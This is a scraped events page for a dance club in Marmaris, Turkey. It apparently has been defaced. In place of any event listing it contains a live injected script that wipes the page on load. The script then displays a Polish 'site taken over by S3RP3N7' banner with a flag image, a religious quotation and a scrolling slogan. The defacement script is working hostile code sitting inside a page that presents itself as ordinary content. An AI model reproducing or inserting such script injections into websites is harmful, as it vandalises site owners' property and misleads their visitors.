Etkinlikler
Greenhouse Dans Club Marmaris

Etkinlikler


<script type="text/javascript">document.head.innerHTML="";document.body.innerHTML="";document.body.style.backgroundColor="black";document.body.innerHTML="<center><img src=http://3.bp.blogspot.com/-9a7rLGieooI/VUTO-Au8veI/AAAAAAAADaA/4X7nwJOm144/s1600/poland_flag-1920x1080.jpg width=600 height=500><h1><font color=deepskyblue size=42 face=times>##### STRONA PRZEJĘTA PRZEZ S3RP3N7 #####</font></h1><h2><font color=red size=24 face=times>Bóg trochę ludzi rozpieścił, tworząc za dużo naraz. Zbytek wspaniałości utrudnia nam widzenie Boga. Ale dzięki temu on sam może pozostawać w ukryciu.</font></h2><h2><marquee direction=right behavior=alternate><font color=red size=21 face=times>##### WIERZ W BOGA #####</font></marquee></h2></center>";</script>